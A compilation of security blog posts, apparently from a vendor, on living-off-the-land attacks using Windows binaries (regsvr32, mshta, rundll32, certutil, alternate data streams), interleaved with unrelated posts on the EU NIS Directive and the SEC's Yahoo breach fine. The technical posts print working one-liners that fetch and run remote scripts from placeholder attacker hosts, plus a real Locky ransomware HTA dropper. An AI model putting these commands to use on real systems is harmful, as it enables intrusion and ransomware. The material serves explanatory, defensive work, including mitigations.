For a more complete solution, you’ll need to go back to AppLocker, and exclude or blacklist the offending utilities from being executed by “ordinary users”. Something like what I did below, where I prevented users in the “Plain User” group from executing rundll32 while still allowing administrators:

Use AppLocker to exclude ordinary users from being able to run non-ordinary Windows binaries.

The harsh reality is that there really isn’t a fool-proof solution to LoL hackery. There will always be phish mails that allow attackers to get a foothold and then leverage existing Windows binaries.

In this series, we explored regsvr32, mshta, and rundll32. And while the LoL techniques behind them are well known and defenses are available, these binaries are still being successfully used by attackers, as this recent article proves.

And there are the unknown unknowns: new LoL techniques that the security world may not be aware of and are currently being tried.

What do you do?

This brings us back to a familiar theme of the IOS blog: the hackers will get in, and so you need secondary defenses.

This means categorizing your data; finding and putting more restrictive access rights on the data files that contain sensitive information, to limit what the hackers can potentially discover; and then using monitoring techniques that alert your security teams when attackers access these files or exhibit unusual file access or creation activities.

Hold this thought! We’ll see that Koadic, though very clever, is not completely stealthy. It produces some noise, and it’s possible to detect a Koadic-based attack even when it’s not directly accessing sensitive data.

The Malware Hiding in Your Windows System32 Folder: More Alternate Data Streams and Rundll32

Last time, we saw how sneaky hackers can copy malware into the Alternate Data Stream (ADS) associated with a Windows file. I showed how this can be done with the ancient type command. As it turns out, there are a few other Windows utilities that also let you copy into an ADS.

For example, extract, expand, and our old friend certutil are all capable of performing this ADS trick. For a complete list of these secret file-copying binaries, check out Oddvar Moe’s latest gist.

In my testing, I used extract to copy an evil JavaScript malware sample into the ADS of a .doc file.

In the old command shell, dir /r shows you the ADS for each file.

Ready, Set, Launch

This brings up a larger point about Windows utilities: they can perform multiple functions — some of them less well known than others. In fact, the aforementioned utilities listed by Oddvar are all capable of a normal file copy as well as the ADS variant.

This is not a revelation in itself. However, it does mean that security monitoring software that’s trying to detect, say, an unusual file copy or transfer can’t just rely on searching the Windows Event logs for a “copy” in the command line. Living off the land (LoL) is all about trickery and making it harder for the defense to understand that their IT systems are even under attack.

This leads to a favorite topic of the IOS blog: security software that doesn’t have visibility into the underlying file system structures can be easily tricked by hackers. Oh wait, there just happens to be a solution that looks under the file system hood and so won’t be taken in by these LoL techniques.

Let’s get back to the actual execution of the evil malware embedded in the ADS. There are a few ways to accomplish this. You can embed JavaScript, as I did last time, and then execute the ADS using wscript, the Windows-based app that runs the scripting engine.
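The launch itself is a one-liner along these lines (the file and stream names are hypothetical):

wscript stuff.txt:evil.js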

For kicks, I tried cscript, which is the command-line version, and you can gaze on the GIF I created of my hacking session:

You are getting sleepy as you watch this GIF showing JavaScript malware launched from the ADS. Sleepy.

Can you embed an HTA file and launch the malware with mshta? Affirmative.

And PowerShell works fine as well. Oddvar Moe also has a great post enumerating different ways to launch executables from the ADS. Thanks (again) Oddvar!

Back to the Event Logs

I confess to being a little reluctant to turn on more granular event auditing on my VirtualBox environment – it’s already a sluggish thing as it is.

I threw caution to the wind, and enabled the command line auditing setting, which can be found buried in the GPO console under \Computer Configuration\Administrative Templates\System\Audit Process Creation. Now, I’ll be able to see command line arguments for every process that’s launched. And having previously enabled PowerShell command logging, I’ll be faced with an embarrassment of logging riches.

To its credit, Windows logs very detailed information — for example, the ADS I referenced when I launched my aforementioned evil JavaScript:

Got you! With command line auditing, the reference to the JavaScript hidden in the ADS is now visible for all to see in the log.

There’s also a log entry displaying the actual PowerShell code (launched by the JavaScript) — in my scenario, it pulls down a remote PowerShell script and then executes it:

Hmmm, a PowerShell session that downloads and executes a remote script. Wonder if it’s connected with JavaScript in the ADS file?

Even with all this extra information in the log, it’s still not necessarily an easy task — there are tools to help, of course — to correlate these two separate events, the cscript and the PowerShell session, and then determine that there are abnormal activities taking place.

One More Thing: Rundll32 and Command Line JavaScript

If you don’t enable Windows granular command line tracking and PowerShell auditing for performance reasons, then data security monitoring and incident detection become almost impossible when faced with the malware-free techniques used by hackers. To add to the security conundrum, hackers have even more tricks up their virtual sleeves to make life difficult for IT security groups.

Some LoL-ware that accepts a local script file or remote URL reference — for example, mshta — also allows raw JavaScript (or VBScript) to be passed in on the command line!

I’ve not mentioned rundll32 before, but it’s a LoL binary that has this direct JavaScript capability. The following bit of script using rundll32 does as advertised — launching a PowerShell session that then writes a little “Boo” message. In real-world hacking, this message would be replaced with the first step in the attack.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c write-host BooHaaa!");

Infosec analysts who are searching through raw Windows logs on a server in which granular auditing has been disabled will have a difficult time working out a connection between a rundll32 process event and a subsequent PowerShell event. Unless they’ve read this post!

There’s still more.

Remember scriptlets, those bits of JavaScript that can be treated like COM objects?

So … here’s a great one-liner that uses GetObject to pull in a remote scriptlet and then execute it locally. You just need a small bit of JavaScript (or VBScript) to call the GetObject method. Both rundll32 and mshta can accept the script directly. The mshta version, using VBScript to call GetObject, is as follows:

mshta vbscript:Close(Execute("GetObject(""script:http://yourserver/thing.sct"")"))
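And for completeness, the rundll32 flavor of the same GetObject trick looks something like this, as documented in the LoL literature (yourserver is again a placeholder):

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://yourserver/thing.sct")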

Basta!

I think we’ve covered enough ground in this post. At the end of the day, I’m presenting different ways hackers can inflict pain on a beleaguered IT security group. If you’re looking for homework till next time, you can ponder these last two scripts, and study this Stack Overflow article explaining how rundll32 does its magic. We’ll take another look at rundll32, and I’ll chat about some ways to protect against this hacker voodoo.

EU NIS Directive (NISD) Holds Surprises for US Online Companies

Last month, a major data security law went into effect that will impact businesses both in the EU and the US. No, I’m not talking about the General Data Protection Regulation (GDPR), which we’ve mentioned more than a few times on the IOS blog. While more narrowly focused on EU “critical infrastructure”, the NIS Directive or NISD also has some surprising implications for non-EU companies not remotely in the business of running hydroelectric plants or other critical or essential services.

It’s a Directive!

A key point to keep in mind is that this new law is a directive. We know from the pre-GDPR Data Protection Directive (or DPD) that, in the language of EU bureaucrats, a directive is an outline or template for a law. Individual EU countries have to fill in the details when they “transpose” it into local laws.

NISD merely says that certain companies performing “essential services” — EU-speak for critical infrastructure — must take “appropriate technical and organizational measures” against cyber attacks and then notify authorities “without undue delay” when there’s a significant security incident.

That is all she wrote!

Because NISD is not in any way prescriptive, there’s a lot of wiggle room for legislators to fill in the details. Yes, this does mean that, like the older DPD privacy law, NISD will vary significantly by country – with some national regulators being far stricter with fines and enforcement.

A few countries have already implemented NISD — for example, the UK has localized its version – but most are still hammering out the details. As it turns out, the laggards have a little more time to work out their individual laws: NISD says that EU countries have until November 2018 to identify specific operators of essential services.

That’s right! Unlike the GDPR, the NISD (for the most part) will apply to an explicit set of companies in the essential services sector, which includes energy, transportation, health, finance, and banking.

As I write this, I am not aware of any EU country that has produced this list. In effect, NISD is on pause until we hear more from local governments on the essential service picks.

US Digital Service Providers Are Under NISD

However, NISD carves out an exception for digital service providers: EU countries do not have to come up with a list of companies that offer essential online infrastructure. According to NISD, any company offering cloud computing, an online marketplace connecting buyers with sellers, or search engine services is automatically a digital provider!

And they would fall under NISD rules right now. (FYI: Micro and small digital providers that have under 50 employees and less than €10 million revenue are excluded.)

US companies in the cloud and online marketplace space — and there are many — will certainly have to up their game for their EU locations.

But there’s another catch.

Remember how the GDPR applies to companies outside the EU even if they don’t have a physical presence there?

Like the GDPR, NISD also has an expanded territorial scope. If a US company has, say, an online marketplace for apartment vacation rentals and promotes that service in the UK or France, then it would fall under NISD. You can read more about the international territorial scope of NISD in this legal article.

Reporting a NISD Cyber Attack

NISD lists a few parameters to help digital service providers decide whether a cyber attack has had a “substantial impact” on its operations. They include the number of subscribers affected, duration, geographical scope, and economic costs.

The fine print from NISD for reporting a cyber incident affecting a digital service provider.

For example, a ransomware, DDoS, or other disruptive cyber attack impacting a US online service company offering, say, apartment or car sharing, web hosting, or, cough, search engines in the EU market, regardless of whether it has physical EU servers, is covered by NISD. And the company would have to report the incident to the local regulator, known in NISD as a Computer Security Incident Response Team or CSIRT.

There will be fines for noncompliance!

As a baseline, the UK’s implementation of NISD has set maximum fines of £17 million. Mileage can vary, of course, as each EU country is free to set its own fines and penalties.

In any case, US digital providers now have another EU law to take into account. In short, not only do they have to comply with the GDPR’s security and privacy rules for personal data, but also with NISD’s more general requirements for securing IT and networking infrastructure against disruption.

The Malware Hiding in Your Windows System32 Folder: Certutil and Alternate Data Streams

We don’t like to think that the core Windows binaries on our servers are disguised malware, but it’s not such a strange idea. OS tools such as regsvr32 and mshta (LoL-ware) are the equivalent in the non-virtual world of garden tools and stepladders left near the kitchen window. Sure, these tools are useful for work around the yard, but unfortunately they can also be exploited by the bad guys.

Take, for example, HTML Application, or HTA, which I wrote about last time. At one point, it was a useful development technology that allowed IT people to leverage HTML and JavaScript or VBScript to create webby apps (without all the browser chrome). That was back in the early ‘aughts.

Microsoft no longer supports HTA, but they left the underlying executable, mshta.exe, lying around on Windows’ virtual lawn – the Windows\System32 folder.

And hackers have only been too eager to take advantage of it. To make matters worse, on far too many Windows installations the .hta file extension is still associated with mshta, so a phishmail victim who receives an .hta file attachment will automatically launch the app if she clicks on it.

Of course, you’ll have to do more than just disassociate the .hta extension to stop all attacks — see, for example, the Windows Firewall mitigation in the previous post. For kicks, I tried directly executing an .hta file using mshta, and you can see the results below:

Still crazy after all these years: mshta and .hta

It worked fine.

In a hacking scenario where the attacker is already on the victim’s computer, she could download the next phase using, say, curl, wget, or PowerShell’s DownloadString, and then run the embedded JavaScript with mshta.

But hackers are far too smart to reveal what they’re doing through obvious file transfer commands! The whole point of living off the land using existing Windows binaries is to hide activities.

Certutil and Curl-free Remote Downloading

This leads to certutil, which is yet another Windows binary that serves dual purposes. Its function is to dump, display, and configure certification authority (CA) information. You can read more about it here.

In 2017, Casey Smith, the same infosec researcher who told us about the risks in regsvr32, found a dual use for certutil. Smith noticed that certutil can be used to download a remote file.

It’s a certification tool. No, it’s a stealthy way to download malware. Certutil is both!

This is not completely surprising, since certutil has remote capabilities, but it clearly isn’t checking the format of the file, effectively turning certutil into a LoL-ware version of curl.
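If you want to try it yourself, the download one-liner looks something like this (the URL and file names are hypothetical):

:: Pull down a remote "certificate" that is really a PowerShell script:
certutil.exe -urlcache -split -f http://evilserver.example/payload.ps1 payload.ps1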

As it turns out, hackers were way ahead of the researchers: it was reported that Brazilian hackers had been using certutil for some time.

So if hackers obtain shell access through, say, an SQL injection attack, they can use certutil to download, say, a remote PowerShell script to continue the attack — without triggering any virus or malware scanners searching for obvious hacking tools.

Hiding Executables With Alternate Data Streams (ADS)

Can the attackers get even stealthier? Unfortunately, yes!

The amazingly clever Oddvar Moe has a great post on Alternate Data Streams and how they can be used to hide malware scripts and executables in a file.

ADS was Microsoft’s answer to supporting compatibility with the Apple Macintosh’s file system. In the Mac world, files have a lot of metadata, in addition to regular data, associated with them. To make it possible to store this metadata in Windows, Microsoft created ADS.

For example, I can do something like this:
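Roughly, the commands behind the screenshot look like this (a sketch; the name of the .hta source file is my assumption):

:: Redirect the contents of an .hta file into an alternate stream of stuff.txt:
type evil.hta > stuff.txt:evil.ps1

:: stuff.txt still reports a size of 0 bytes ...
dir stuff.txt

:: ... but the /r switch reveals the hidden stream, stuff.txt:evil.ps1:$DATA
dir /r stuff.txt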

Omg, I directed text into a file and the file size didn’t change! Where did it go? It’s in ADS. #stealthy

On a first review, it might look like I’m directing the text of my .hta file into “stuff.txt”.

Take a closer look at the above screenshot, and notice the “:evil.ps1” that’s tacked on. And then shift your focus to the size of “stuff.txt”: it remains at 0 bytes!

What happened to the text I directed into the file? It’s hidden in the ADS part of the Windows file system. It turns out that I can directly run scripts and binaries that are secretly held in the ADS part of the file system.
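For instance, here’s one way the hidden script could be run, sketched with PowerShell’s -Stream parameter (available in PowerShell 3 and later):

# Read the script out of the alternate stream and execute it in memory:
powershell -NoProfile -Command "Get-Content .\stuff.txt -Stream evil.ps1 -Raw | Invoke-Expression"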

And One More Thing

We’ll take a deeper dive into ADS next time. The larger point is the high level of stealthiness one can achieve with the LoL approach to hacking. There are other binaries that serve dual masters, and you can find a complete list of them on GitHub.

For example, there is a class of Windows binaries, esentutl, extrac32, and others, that act as file copy tools. In other words, the attackers don’t necessarily have to reveal themselves by using the obvious Windows “copy” command.
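Based on the switches documented in the LOLBAS project, the copies might look something like this (the paths are hypothetical):

:: Copy a file with the ESE database utility instead of "copy":
esentutl.exe /y C:\Users\bob\payroll.xlsx /d C:\staging\payroll.xlsx /o

:: Or with the cabinet extraction tool:
extrac32.exe /Y /C \\fileserver\share\secret.docx C:\staging\secret.docx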

So security detection software that’s based on scanning the Windows Event log looking for the usual Windows file commands will miss sneaky LoL-based hacker file activity.

The lesson is that you need, ahem, a security platform that can analyze the raw file system activity to determine what’s really going on. And then notify your security team when it detects unusual access to the underlying files and directories.

Does the LoL-ware approach to hacking scare you, just a little? Our Varonis Data Security Platform can spot what the hackers don’t want you to see. Learn more!

What C-Levels Should Know about Data Security, Part I: SEC Gets Tough With Yahoo Fine

The Securities and Exchange Commission (SEC) warned companies back in 2011 that cyber incidents can be costly (lost revenue, litigation, reputational damage), and therefore may need to be reported to investors. Sure, there’s no specific legal requirement to tell investors about cybersecurity incidents, but public companies are required by the SEC to inform investors in their filings of any news that may impact their investment decisions.

Actual cyber incidents or even potential security weaknesses can be, in legal speak, “material” information that would have to be reported to the SEC immediately in an 8-K, or else in quarterly 10-Q and annual 10-K forms. You can read more about what material means in our post on the SEC’s latest guidelines for cyber reporting.

And then along came Yahoo and its massive breach, which occurred way back in 2014 and wasn’t publicly reported until 2016. To refresh memories: after more than a two-year delay, Yahoo initially said that a mere 1 billion accounts had been stolen, but later adjusted that number to 3 billion.

The disclosure of this massive breach came out after Verizon had announced its acquisition of Yahoo. The new information ultimately led Verizon to reduce its bid for Yahoo by about $350 million.

If there were ever a test case for the SEC to show that it was serious about enforcing the reporting of material cyber incidents, this would be it.

The SEC Has Spoken

In late April, the SEC announced a settlement with Yahoo, now known as Altaba, in which the company agreed to pay a fine of $35 million. I’ve excerpted part of the actual settlement below, because it should be required reading for CSOs, CISOs, and CPOs, as well as CFOs and CLOs (though they usually read this kind of thing with their breakfast):

Despite its knowledge of the 2014 data breach, Yahoo did not disclose the data breach in its public filings for nearly two years. To the contrary, Yahoo’s risk factor disclosures in its annual and quarterly reports from 2014 through 2016 were materially misleading in that they claimed the company only faced the risk of potential future data breaches that might expose the company to loss of its users’ personal information stored in its information systems … without disclosing that a massive data breach had in fact already occurred.

Ouch!

This SEC action comes on top of a separate $80 million settlement of a class-action suit brought by investors related to the data breach. There are other lawsuits pending, and you can read about the whole Yahoo legal mess here.

What Should Yahoo Have Done When it Discovered the Breach?

In December 2015, after Yahoo’s CISO learned that highly sensitive information from well over 100 million users had been hacked (usernames, email addresses, hashed passwords, and telephone numbers), upper management, including the legal team, was informed.

The SEC noted that then “senior management and relevant legal staff did not properly assess the scope, business impact, or legal implications of the breach, including how and where the breach should have been disclosed in Yahoo’s public filing …”

And the SEC pointed out that upper management didn’t disclose the breach to Yahoo’s auditors or outside counsel to get their advice.

Yeah, they should have filed an 8-K immediately.

More specifically, the SEC called out Yahoo for not maintaining “disclosure controls and procedures” for reporting, analyzing, and assessing both actual security incidents and potential security weaknesses.

In plain speak, companies are supposed to have agreed-upon procedures for getting cyber security information to management, and higher management needs to have rules in place to guide them in analyzing and disclosing a breach or a potential data security risk.

Let’s Go to the SEC Files

To get a sense of how a company reports its cybersecurity status when it wants to say there’s nothing unusual going on, I found a plain, garden-variety example after reviewing some 10-K annual reports on the SEC’s site (and gulping down a few coffees):

Boilerplate risk assessment: when infosec is going well, this is what you report.

You can usually find this kind of information in the risk section of the report. In short: this company has the usual standard cyber risk profile, and in their case, there are currently no serious cyber incidents impacting them.

Good enough.

Then I looked at Yahoo’s annual report from 2016, where they discussed what they referred to as “the security incident” for the first time.

What you say when you have a “security incident”.

Obviously, this information should have been reported much earlier, but note that Yahoo discusses the PII that was exposed, the extent of the exposure (at least 500 million accounts), and the status of their ongoing investigation.

CFO Learns Programming

In the next post, I’ll provide more details and some advice about what public companies need to be doing to meet the SEC’s data security reporting guidelines. However, it’s clear from reading the latest guidance from earlier this year (and I’m saying that as a blogger, not as a compliance attorney) that C-levels will be forced to pick up basic computer and data security knowledge.

To make the SEC (and investors) happy, public companies should go beyond having breach disclosure procedures in place. At some point, the raw intelligence will need to be examined by well-informed decision makers at the top. As the SEC guidance points out, companies should “evaluate the significance associated with such [cyber] risks and incidents.”

In other words, the CEO, CFO, and the legal team will need to acquire the appropriate technical background to understand what it means when, say, an assessment report says that your customers’ credit card directory has an “Everyone” ACL, or that a hashed password file was stolen but can be easily cracked.
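To make the first finding concrete, here’s the kind of hypothetical check an analyst might run and report up the chain, sketched in PowerShell (the folder path is my assumption):

# Which files and folders under the card-data directory grant access to "Everyone"?
Get-ChildItem C:\data\cards -Recurse | Get-Acl |
    Where-Object { $_.AccessToString -match 'Everyone' } |
    Select-Object Path, AccessToString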

I’m not saying your CFO should take Computer Science 101 and understand what hashing means (though it’s not a bad idea!), but the C-suite should have enough technical and infosec context to make the right evaluation!

More C-suite infosec wisdom next time.

The Malware Hiding in Your Windows System32 Folder: Mshta, HTA, and Ransomware

The LoL approach to hacking is a lot like the “travel light” philosophy for tourists. Don’t bring anything to your destination that you can’t find or inexpensively purchase once you’re there. The idea is to live like a native. So hackers don’t have to pack any extra software in their payload baggage to transfer external files: regsvr32 is already on the victim’s computer.

As I pointed out last time, there’s the added benefit that regsvr32 allows hackers to stealthily execute JavaScript and VBScript without being detected by AppLocker.

The victim clicks on a phishing email attachment, or downloads and opens a file from the hacker’s website, and then a single regsvr32 command line can run a script (technically, through Windows Script Host) that performs the initial setup of what is typically a multi-step attack. No malware binaries involved, since it’s all done “legally” through resident software.
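That single command line looks something like the following, a sketch based on Casey Smith’s published technique (the URL is hypothetical):

:: Silently fetch and execute a remote COM scriptlet; scrobj.dll does the dirty work:
regsvr32 /s /n /u /i:http://evilserver.example/payload.sct scrobj.dll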

It’s slick, low-profile hacking.

Some Mitigations For Regsvr32 Attacks

In terms of defending against LoL-ware, the major stumbling block is that these leveraged Windows tools also have legitimate uses. You can’t simply eliminate regsvr32.

One approach to reducing the risks of LoL-ware is through the whitelisting techniques available in AppLocker. When was the last time you, as an ordinary user, needed regsvr32? I manage to get through my blogging day without having to register DLLs.

The larger point, of course, is that most LoL-ware is meant for sys admins. Back when I was first writing about PowerShell as an attack tool, I described how to use AppLocker to limit who can work with PowerShell. A pure whitelist approach is difficult to pull off, so I just used AppLocker’s default rules and made some exceptions, only allowing power users access to PowerShell.

I can do something similar with LoL-ware binaries, and you can see the results below when I try to run regsvr32 as ordinary user bob.

Take that hacker! I blocked you with AppLocker.
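If you’d rather not log in as bob to check the rules, AppLocker’s PowerShell cmdlets can do a dry run for you. A quick sketch (the domain and user names are assumptions):

# Ask the effective AppLocker policy what it would decide for bob:
Get-AppLockerPolicy -Effective |
    Test-AppLockerPolicy -Path C:\Windows\System32\regsvr32.exe -User corp\bob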

Another, less drastic, mitigation is simply to turn off Internet access for regsvr32. In other words, prevent it from running remote scriptlets living on the hackers’ own servers.

This can be accomplished through Windows Firewall, which I found under the Administrative Tools section of my Windows 7 environment. The Firewall console lets you tune network access on a per-application basis. In my case, I turned off outbound access for regsvr32 both to public networks (the Internet) and internally within the domain. Regsvr32 still works normally for DLL registration, but I’ve effectively disabled the /i option’s secret feature of pulling scripts from the Intertoobz.

Did you know that Windows Firewall gives you granular control over individual apps? You do now!
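For reference, roughly the same rule can be added from an elevated command prompt; here’s a sketch (the rule name is mine):

:: Block all outbound traffic from regsvr32 on the domain and public profiles:
netsh advfirewall firewall add rule name="Block regsvr32 outbound" dir=out action=block program="C:\Windows\System32\regsvr32.exe" profile=domain,public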

By the way, this seems to be the approach taken by Amazon Web Services, and I suspect other cloud providers as well. When I recently tried the regsvr32 /i hack on an AWS instance, it failed. It took me a while to realize it was being blocked by the default firewall rules that now seem to be standard for AWS.

Kudos to Amazon for keeping up with LoL-ware mitigations.

And Along Came HTA

A long time ago, on a distant operating system (XP), Microsoft introduced an idea called HTML Applications, or HTA. The idea was to let developers create web applications for Internet Explorer (IE) without “enforcing the strict security model and user interface of the browser.” They even got a patent for it back in 2003.

Microsoft discontinued this awesome idea and stopped supporting it in later versions of IE, but the underlying engine that does the real work, mshta.exe, can still be found under \Windows\System32.

Of course, during the time when HTA was available, hackers realized they could get IE to launch scripts without the standard browser security checking for, cough, ActiveX objects. And that meant they could obtain shell sessions and run malicious code.

Here’s an old article, circa 2003, describing this technique.

Since current IE browsers no longer support HTA, adaptable hackers found another way to deliver the HTA code to users. They sent it as an email attachment (duh!) with an .hta extension, and tricked the victims into clicking on the file.

Wait, can that work?

Yes! As I mentioned, the legacy mshta.exe is still there, presumably to support old HTA apps that were written by over-eager developers. And on far too many sites, the .hta file type is (agonizing sigh) still associated by default with mshta.

All too often, .hta is still associated with mshta. #humans!

In other words, by clicking on a file with an .hta suffix, the victim of a phishing email launches mshta and runs the script embedded in the HTML.

What does the HTA file look like? Here’s a sample script taken from a real-world ransomware attack.

<HTML>
<HEAD>

<script>
try {
  // Launch a hidden PowerShell session (window style 0, no waiting) that downloads
  // the next stage to %TEMP%, runs it, and pops a fake "Update complete" message
  // box to reassure the victim:
  a = new ActiveXObject('Wscript.Shell');
  a.Run("PowerShell -nop -noe $d=$env:temp+'\\4c2187acf5b34b9e97b6c675b7efba92.ps1';(New-Object System.Net.WebClient).DownloadFile('http://evilserver.com',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information);", 0, false);

  // Cover tracks: delete the .hta file the victim clicked on.
  var b = new ActiveXObject('Scripting.FileSystemObject');
  var p = document.location.href;
  p = unescape(p.substr(8));   // strip the "file:///" prefix to get a plain path
  if (b.FileExists(p)) b.DeleteFile(p);
} catch (e) {}
close();
</script>
</HEAD>
<BODY>

</BODY>
</HTML>

Similar to the COM scriptlets I wrote about, the HTA file acts as a container for a few lines of JavaScript. The goal is to launch a PowerShell session that downloads and directly executes the code containing the next phase of the attack.

Mshta Meets Locky

Unfortunately, many IT groups aren’t aware that native Windows binaries, such as regsvr32, mshta, and others, can be used against them.

A good example of this is hackers sending phishing emails with attached HTA files and ultimately getting victims to self-install ransomware. The success of Locky ransomware and its variants is actually based on simple and crudely designed social attacks (below).

Yeah, this cleverly written phish mail tricked many people into clicking on an HTA file and launching a ransomware attack.

Another effective ploy was emailing corporate victims and asking them to download a Chrome browser update from the hacker’s website. In fact, the HTA code above was taken from a file called chrome_patch.hta used in a real-world ransomware attack.

The social engineering in either of these approaches is just clever enough to fool an average employee who hasn’t received any special security training. Or perhaps an executive who’s a little too busy and susceptible to clicking on a phish mail attachment referring to, say, a FedEx invoice.

For kicks, I took some of the HTA above, tweaked it so it would download my PowerShell “boo” message, and then used a JavaScript obfuscator to make it even stealthier and less likely to be detected by malware scanners. I also added a .pdf suffix before the .hta, to trick the unwary user:

Obfuscated JavaScript embedded in HTML by way of HTA. #sneaky

When I clicked on the HTA file, I was presented with a security dialog (thank you, Microsoft, for this tip-off) asking whether I wanted to “run” what was supposed to be a document.

What happens when you click on an HTA file? You get a warning from Microsoft, but many people clicked on “Run” anyway.

All too many users became victims of Locky because they went ahead and clicked “Run” despite the security warning. Humans like to click!

Mshta Mitigations

Ransomware attacks of the last two years that were based on HTA could have been easily stopped with a few simple configurations. As we saw above for regsvr32, closing Internet connectivity for mshta through the Windows Firewall, or blocking it for average users with AppLocker, are both good defensive measures.

Even simpler is to change the .hta file type association from mshta to something more benign, like launching notepad! By the way, that’s a very common approach, and the user should have some questions when notepad shows her code instead of an invoice. At least, we hope so.
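Here’s one way to make that change from an elevated command prompt, sketched below (by default, the .hta extension maps to the htafile type):

:: Confirm the extension-to-file-type mapping:
assoc .hta

:: Re-point the htafile type at notepad instead of mshta:
ftype htafile="C:\Windows\System32\notepad.exe" "%1"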

In the next post, we’ll look at a few more binaries that allow you to run scripts. And then we’ll review other LoL-ware that lets you mask common file activities.

I hope you’re seeing that the main point of LoL hackcraft is to make it appear to the observers in the IT security room that the hacker is just another user running standard Windows utilities. And that to reduce the damage of these attacks, you’ll need better secondary defenses!
